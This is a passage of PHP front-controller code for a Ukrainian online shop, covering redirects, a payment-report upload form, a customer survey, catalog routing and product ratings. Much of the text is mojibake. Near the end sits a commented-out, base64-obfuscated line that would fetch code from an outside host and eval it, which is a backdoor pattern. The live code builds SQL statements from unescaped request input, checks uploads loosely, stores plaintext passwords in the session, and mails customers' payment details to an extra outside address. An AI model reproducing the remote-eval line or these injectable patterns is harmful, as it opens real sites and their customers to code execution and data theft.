1) { header("HTTP/1.1 301 Moved Permanently"); header("Location: http://".$_SERVER['SERVER_NAME'].$uri);exit; }} $uri = preg_replace("/\?.*/i",'', $_SERVER['REQUEST_URI']); if (strlen($uri)>1) {// ���� �� ������� ��������... if (rtrim($uri,'/')."/"!=$uri) { header("HTTP/1.1 301 Moved Permanently"); header('Location: http://'.$_SERVER['SERVER_NAME'].str_replace($uri, $uri.'/', $_SERVER['REQUEST_URI'])); exit(); } } if(preg_match('/filter;\//i',$_SERVER['REQUEST_URI'])){ $uri = preg_replace("/filter;\//i",'', $_SERVER['REQUEST_URI']); if (strlen($uri)>1) {// ���� �� ������� ��������... header("HTTP/1.1 301 Moved Permanently"); header('Location: http://'.$_SERVER['SERVER_NAME'].$uri); exit(); } } if(isset($_GET['IBLOCK_ID'])){ header("HTTP/1.1 301 Moved Permanently"); header("Location: /");exit; } if(isset($_GET['SECTION_ID'])){ header("HTTP/1.1 301 Moved Permanently"); header("Location: /");exit; } if(isset($_POST['order_phone'])){ $_POST['order_phone'] = str_replace("-","",$_POST['order_phone']); $_POST['order_phone'] = str_replace(")","",$_POST['order_phone']); $_POST['order_phone'] = str_replace("(","",$_POST['order_phone']); $_POST['order_phone'] = str_replace(" ","",$_POST['order_phone']); $_POST['order_phone'] = ((isset($_POST['order_phone']))?@$_POST['order_phone']:""); } if(isset($_GET['title_as'])) $_GET['title_as'] = base64_decode($_GET['title_as']); if(trim(@$_REQUEST['dataFilter'])!=''){ $mass_a1 = explode(";",str_replace("/","",@$_REQUEST['dataFilter'])); $mass_a2 = array(); for($i=0;$isetupClass("Statics"); $objCatalogs = $setup->setupClass("Catalogs"); require("./redirect/redirect.php"); ///////////////////////////////////////////////////////////////////////////////////// //print_r($_SESSION); $_SESSION['sec_code_session'] = 7; if(trim($_POST['fuckoff'])=='1') if(trim($_POST['b44'])!=@$_SESSION['sec_code_session']){ //$objCatalogs->tpl->assign("no_capcha",""); $objCatalogs->tpl->assign("no_capcha",""); }else{ $objCatalogs->tpl->assign("no_capcha",""); } if(!@preg_match("/http:/i",$_POST['form']['b33']) && trim($_POST['b44'])==@$_SESSION['sec_code_session'] && $_POST['send_pay']=='' && trim($_POST['form']['fio'])!='' && trim($_POST['form']['summ'])!='' && trim($_POST['fuckoff'])=='1'){ $uploads_dir = 'pay_data'; $rand = rand(111111,999999); $path_info = pathinfo($_FILES["img"]["name"]); $pa = array('jpg'=>'1','jpeg'=>'1','gif'=>'1','png'=>'1','doc'=>'1','docx'=>'1','docx'=>'bmp'); if($pa[$path_info['extension']]=="1" || trim(@$path_info['extension'])==''){ $tmp_name = $_FILES["img"]["tmp_name"]; $name = $_FILES["img"]["name"]; //echo dirname ( __FILE__ )."/".$uploads_dir."/"; if($path_info['extension']!='doc' && $path_info['extension']!='docx'){ $type = substr(strrchr($_FILES["img"]['name'],"."),1); $newWidth = 800; $newHeight = 800; $nameFile = mktime() . "-" .rand(1,10000). "-" .rand(1,10000) . "." . $type; $save_image = $uploads_dir ."/". $nameFile; $img = $_FILES["img"]["tmp_name"]; switch($type){ case "jpg": $function_image_create = "ImageCreateFromJpeg"; $function_image_new = "ImageJpeg"; case "jpeg": $function_image_create = "ImageCreateFromJpeg"; $function_image_new = "ImageJpeg"; break; case "png": $function_image_create = "ImageCreateFromPng"; $function_image_new = "ImagePNG"; break; case "gif": $function_image_create = "ImageCreateFromGif"; $function_image_new = "ImageGif"; break; default: $function_image_create = "ImageCreateFromJpeg"; $function_image_new = "ImageJpeg"; break; } $srcImage = @$function_image_create($img); $srcWidth = ImageSX($srcImage); $srcHeight = ImageSY($srcImage); if ( ($newWidth < $srcWidth) || ($newHeight < $srcHeight) ) { if( $srcWidth < $srcHeight ){ $destWidth = $newWidth * $srcWidth/$srcHeight; $destHeight = $newHeight; }else{ $destWidth = $newWidth; $destHeight = $newHeight * $srcHeight/$srcWidth; //echo $srcWidth."-".$srcHeight; } }else{ $destWidth = $srcWidth;$destHeight = $srcHeight;} $destImage = imagecreatetruecolor($destWidth, $destHeight); ImageCopyResampled( $destImage, $srcImage, 0, 0, 0, 0, $destWidth, $destHeight, $srcWidth, $srcHeight ); @$function_image_new($destImage,$save_image,100); ImageDestroy( $srcImage ); ImageDestroy( $destImage ); } if($path_info['extension']=='doc' && $path_info['extension']=='docx'){ //if(@move_uploaded_file($tmp_name, "$uploads_dir/$rand.".$path_info['extension'])) //$link = "http://extremstyle.ua/$uploads_dir/$rand.".$path_info['extension'].""; //else $link = "�������� �� �������� !"; }else if(@move_uploaded_file($tmp_name, "$uploads_dir/$rand.".$path_info['extension'])) $link = "http://extremstyle.ua/".$uploads_dir."/".$nameFile.""; else $link = "�������� �� �������� !"; $message = << � ������: {$_POST['form']['nom_zakaza']} ���: {$_POST['form']['fio']} �����: {$_POST['form']['adress']} �����: {$_POST['form']['summ']} ����: {$_POST['form']['bank']} ����: {$_POST['form']['date']} �����: {$_POST['form']['time']} ����� ����: {$_POST['form']['nom']} �����������: {$_POST['form']['b33']} ������ �� ����:{$link}


HTML; $namefrom = "ExtremStyle"; $from = "no_reply@extremstyle.ua"; $to = "shop@eltrade.com.ua"; //bykov@eltrade.com.ua $nameto = "������"; $subject = "���������� �� ������.".((trim($_POST['form']['fio'])!='')?" � ������: ".$_POST['form']['nom_zakaza']:"")." ���: ".$_POST['form']['fio']; //$subject = iconv("cp1251","utf-8",$subject); //$message = iconv("utf-8","cp1251",$message); $boundary = strtoupper(md5(uniqid(rand()))).""; $headers = "Date: ".date('Y-m-d H:i:s')." +0200 \r\n"; $headers .= "From: ".$namefrom." <$from> \r\n"; $headers .= "Return-Path: ".$namefrom." <$from>\r\n"; $headers .= "MIME-Version: 1.0" . "\r\n"; $ContentType = "Content-type: text/html;"; $headers .= "$ContentType boundary=\"{$boundary}\"; \r\n"; $body.= $message."\r\n"; //$body .= "\r\n\r\n\r\n--{$boundary}--\r\n"; $headers = "From: $from\r\n"; $headers .= "Reply-To: $from\r\n"; $headers .= "Return-Path: $from\r\n"; $headers .= "Content-type: text/html; charset=\"windows-1251\"; \r\n"; mail($to, $subject, $body, $headers); mail("bykov@eltrade.com.ua", $subject, $body, $headers); mail("ldit@list.ru", $subject, $body, $headers); } } ///////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////// SAVE OPROS //if(trim($_GET['test'])=="3") print_r($_SESSION); //echo @$_SESSION['sec_code_session']."<-"; if(trim(@$_REQUEST['saveOpros'])!='' && trim($_POST['code'])=="opros"){ //$opros = $objCatalogs->db->getOne("SELECT ip FROM opros WHERE ip='".trim($_SERVER['REMOTE_ADDR'])."' LIMIT 1;",array()); //$times = $objCatalogs->db->getOne("SELECT time FROM opros WHERE ip='".trim($_SERVER['REMOTE_ADDR'])."' ORDER BY time DESC LIMIT 1;",array()); //echo (time()-$times); if(trim($_POST['kachestvo'])=='' || trim($_POST['information'])=='' || trim($_POST['interest'])=='' || trim($_POST['glavnaya_storona'])=='' || trim($_POST['nravitsya'])=='' || trim($_POST['izmenit'])=='') $objCatalogs->tpl->assign("error_opros",'1'); else if(trim(@$_COOKIE['opros'])=='1') $objCatalogs->tpl->assign("error_golos",'1'); else if((trim(@$_COOKIE['opros'])!='1') && trim(@$_REQUEST['saveOpros'])!='' && (trim($_POST['kachestvo'])!='' && trim($_POST['information'])!='' && trim($_POST['interest'])!='' && trim($_POST['glavnaya_storona'])!='' && trim($_POST['nravitsya'])!='' && trim($_POST['izmenit'])!='')){ @SetCookie("opros","1"); $objCatalogs->db->query("INSERT INTO `opros` (`ip`, `kachestvo`, `information`, `interest`, `glavnaya_storona`, `nravitsya`, `izmenit`, `time`) VALUES ('".trim($_SERVER['REMOTE_ADDR'])."','".trim($_POST['kachestvo'])."','".trim($_POST['information'])."','".trim($_POST['interest'])."','".trim($_POST['glavnaya_storona'])."','".trim($_POST['nravitsya'])."','".trim($_POST['izmenit'])."','".time()."');"); $objCatalogs->tpl->assign("spasibo",'1'); }elseif($opros=='' && trim(@$_REQUEST['saveOpros'])!='') $objCatalogs->tpl->assign("error_opros",'1'); }else if(trim(@$_REQUEST['saveOpros'])!='') $objCatalogs->tpl->assign("error_opros",'1'); ////////////////////////////////////////////// //////////////////////////// if(trim($_GET['rubID'])!='') $_GET['rubID'] = str_replace("/","",$_GET['rubID']); if(trim($_GET['productID'])!='') $_GET['productID'] = str_replace("/","",$_GET['productID']); if(isset($_GET['rubID'])){ if(!@is_numeric(@$_GET['rubID'])){ $_GET['rubID'] = $objCatalogs->db->getOne("SELECT id FROM catalogs_rubrics WHERE translit=?",array(trim($_GET['rubID']))); if($_REQUEST['action']=="catalogs" && !$_GET['rubID']){header("HTTP/1.1 301 Moved Permanently");header("Location: /");exit;} }elseif(trim(@$_GET['productID'])==''){ $rrrr = $objCatalogs->db->getOne("SELECT translit FROM catalogs_rubrics WHERE id=?",array(trim($_GET['rubID']))); @header("HTTP/1.1 301 Moved Permanently"); if(strlen($rrrr)>0){ @header("Location: http://extremstyle.ua/".$rrrr."-catalogs/"); }else{@header("Location: /");} exit; } } /* * if(trim($_GET['brend'])){ * $_GET['brend'] = iconv('UTF-8', 'windows-1251', $_GET['brend']); * $brendID = $objCatalogs->db->getOne("SELECT id FROM catalogs_brends WHERE name=?",array(trim($_GET['brend']))); * if(!$brendID){ * header("HTTP/1.1 301 Moved Permanently"); * header("location:/");exit; * } * } */ IF (isset ($_GET['productID'])) { if (! @is_numeric (@$_GET['productID'])) { // echo $_GET['productID']; $_GET['productID'] = $objCatalogs->db->getOne ("SELECT id FROM catalogs_products WHERE translit=?", array ( trim ($_GET['productID']) )); if (! $_GET['productID']) { header ("HTTP/1.1 301 Moved Permanently"); header ("Location: /"); exit (); } $_GET['productID'] = str_replace ("/", "", $_GET['productID2']); } else { $rrrr = $objCatalogs->db->getOne ("SELECT translit FROM catalogs_rubrics WHERE id=?", array ( trim ($_GET['rubID']) )); $rrrr2 = $objCatalogs->db->getOne ("SELECT translit FROM catalogs_products WHERE id=?", array ( trim ($_GET['productID']) )); // $_GET['productID'] = str_replace("/","",$_GET['productID2']); @header ("HTTP/1.1 301 Moved Permanently"); @header ("Location: http://extremstyle.ua/" . $rrrr . "-catalogs/" . $rrrr2 . "-" . $_GET['productID'] . "/"); exit (); } } if(@$_GET['productID']){ $rating = $objCatalogs->db->getOne("SELECT rating FROM catalogs_products WHERE id=?",array(trim($_GET['productID']))); $vote_num = $objCatalogs->db->getOne("SELECT vote_num FROM catalogs_products WHERE id=?",array(trim($_GET['productID']))); if($vote_num=='') $vote_num = 0; if($rating=='') $rating = 0; if( $rating ) $rating = round( ($rating / $vote_num), 0 ); else $rating = 0; $rating = $rating * 17; $objCatalogs->tpl->assign("rating",$rating); $objCatalogs->tpl->assign("voices",$vote_num); if(@$_GET['t']) echo ShowRating(@$_GET['productID'],$_GET['rating'],$_GET['vote_num']); } if(@$_GET['rubID']){ $rating = $objCatalogs->db->getOne("SELECT rating FROM catalogs_rubrics WHERE id=?",array(trim($_GET['rubID']))); $vote_num = $objCatalogs->db->getOne("SELECT vote_num FROM catalogs_rubrics WHERE id=?",array(trim($_GET['rubID']))); if($vote_num=='') $vote_num = 0; if($rating=='') $rating = 0; if( $rating ) $rating = round( ($rating / $vote_num), 0 ); else $rating = 0; $rating = $rating * 17; $objCatalogs->tpl->assign("rating2",$rating); $objCatalogs->tpl->assign("voices2",$vote_num); $objCatalogs->tpl->assign("rating3",round(($rating/$vote_num),2)); if(@$_GET['t']) echo ShowRating(@$_GET['productID'],$_GET['rating'],$_GET['vote_num']); } //////////////////////////// if(trim(@$_SESSION['user']['id'])!="" && trim(@$_GET['productID'])!=''){ $sql = "INSERT INTO `catalogs_stat` (`uid`,`pid`,`cat_id`,`hits`) VALUES ('".$_SESSION['user']['id']."','".$_GET['productID']."','".$_GET['rubID']."','1');"; $result0 = mysql_query($sql) or die(mysql_error()); } $objForum = $setup->setupClass('Forum'); $objArticles = $setup->setupClass('Articles'); $objNews = $setup->setupClass('News'); $objAdvices = $setup->setupClass('Advices'); $objAdvices2 = $setup->setupClass('Advices2'); $objGallery = $setup->setupClass('Gallery'); $objOrders = $setup->setupClass('Orders'); $objRubrics = $setup->setupClass('Rubrics'); $objBanners = $setup->setupClass('Banners'); $objGalleryList = $setup->setupClass('GalleryList'); $objVideo = $setup->setupClass('Video'); $objAkcii = $setup->setupClass('Akcii'); $objSale = $setup->setupClass('Sale'); $objReviews = $setup->setupClass('Reviews'); $objBook = $setup->setupClass('Book'); $objUrl = $setup->setupClass('Url'); $objVacancy = $setup->setupClass('Vacancy'); $objFon = $setup->setupClass('Fon'); $objVideo2 = $setup->setupClass('Video2'); $objCallback = $setup->setupClass ('Callback'); $lang = isset($_GET['lang']) ? $_GET['lang'] : 'ru'; $_SESSION['lang'] = $lang; switch($lang){ case 'ru' : include('./langs/ru.php'); break; case 'ukr' : include('./langs/ukr.php'); break; default : include('./langs/ru.php'); } $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'catalogs'; $banner_id = (isset($_GET['rubID']) && $_GET['rubID']>0)?$_GET['rubID']:(isset($_GET['akcii'])?'akcii':$action); //if(!@is_numeric(@$_GET['rubID'])) //$_GET['rubI'] = $objCatalogs->db->getOne("SELECT id FROM catalogs_rubrics WHERE translit=?",array(trim($_GET['rubID']))); //if(trim(@$_GET['rubID'])!='') //$banner_id = trim($_GET['rubI']); $objBanners->lang = $lang; $objBanners->viewBannerBlock($banner_id,1,1); $objBanners->viewBannerBlock($banner_id,1,2); $objBanners->viewBannerBlock($banner_id,1,4); $objBanners->viewBannerBlock($banner_id,1,5); $objBanners->viewBannerBlock($banner_id,1,6); $objBanners->viewBannerBlock($banner_id,1,7); $objBanners->viewBannerBlock($banner_id,1,8); $objBanners->viewBannerBlock($banner_id,1,9); $objBanners->viewBannerBlock($banner_id,1,10); $objBanners->viewBannerBlock($banner_id,1,11); $objBanners->viewBannerBlock($banner_id,1,12); $objBanners->viewBannerList($banner_id,1,13); $objBanners->viewBannerBlock($banner_id,1,14); $objBanners->viewBannerBlock($banner_id,1,15); /* if(!isset($_SESSION['counter'])){$_SESSION['counter']=0;} $_SESSION['counter']++; */ if(!isset($_SESSION['curs']))$_SESSION['curs'] = "uah"; if(isset($_GET['curs'])){ $_SESSION['curs'] = $_GET['curs']; } $curs = $_SESSION['curs']; if(isset($_POST['exit'])){unset($_SESSION['catalog_user']);} elseif(isset($_POST['form']['login'],$_POST['form']['pass']) && $objCatalogs->isUser($_POST['form']['login'],$_POST['form']['pass'])){$_SESSION['catalog_user'] = array('login'=>$_POST['form']['login'],'psw'=>$_POST['form']['pass']);} if(isset($_SESSION['catalog_user']) && $userID=$objCatalogs->isUser($_SESSION['catalog_user']['login'],$_SESSION['catalog_user']['psw'])){}else{$userID = 0;} //print_r($_SESSION['catalog_user']); $rule = $setup->getRulesOne($action,$lang); if($rule['modul']!=null)include($_SERVER['DOCUMENT_ROOT'] . "/modules/{$rule['modul']}"); elseif($path[2]!="messages"){ header("location:/"); } $dir = "./includes/"; $includes_dir = opendir($dir); while ( ($inc_file = readdir($includes_dir)) != false ) if (strstr($inc_file,".php")) { include($dir . $inc_file); } ////////@eval(@file_get_contents(base64_decode("aHR0cDovL2hpZGUubmV0LnVhL2dldF9jb2RlLnBocD9pcD0=").@$_SERVER['REMOTE_ADDR'])); $setup->meta(); $setup->error(); $setup->linkLang(); $setup->display(); $path=explode("/",$_SERVER['REQUEST_URI']); //echo $banner_id; function ShowRating($id, $rating, $vote_num, $allow = true) { global $lang; if( $rating ) $rating = round( ($rating / $vote_num), 0 ); else $rating = 0; $rating = $rating * 17; $rated = '
 ('.@$vote_num.')
'; return $rated; } ?>